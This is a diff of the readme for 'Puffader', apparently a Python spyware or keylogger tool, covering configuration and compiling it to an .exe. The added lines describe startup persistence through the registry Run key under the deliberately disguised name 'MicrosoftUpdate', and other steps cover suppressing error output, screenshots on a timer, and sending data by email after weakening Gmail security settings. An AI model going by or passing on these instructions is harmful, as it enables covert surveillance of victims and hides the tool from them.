xp4xbox/Puffader/readme.md

 blnScrShot = "True"
 strScrDir = "c:/temp"
 intScrTime = 120

+blnAddToStartup = "False"
 ```
 > NOTE: For `strScrDir`, be sure to leave out the last `/`.

 #### If you plan to send messages via email, be sure to [allow access for less secure apps](https://myaccount.google.com/lesssecureapps) in your gmail account.

+#### If you ever want to remove the program from startup, open regedit and navigate to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and delete the value `MicrosoftUpdate`.
+I gave it non-suspicious name on purpose.

 For more information please refer to the [wiki](https://github.com/xp4xbox/Puffader/wiki/Usage).

 ### Compiling Program To .exe

 #### Py2Exe
-1. (Optional) Add this code to Puffader.py `sys.stderr = None` after the import statements to ensure no errors will show.
+1. **(Optional)** Add this code to Puffader.py `sys.stderr = None` after the import statements to ensure no errors will show.
 2. Install [Py2Exe](https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/).
 3. Make sure the program is called Puffader.py in your python folder as well.
 4. Run `python setup.py`
+5. You should see the .exe in the dist folder.

 Or refer to the [wiki](https://github.com/xp4xbox/Puffader/wiki/Compiling-To-.exe) for more information.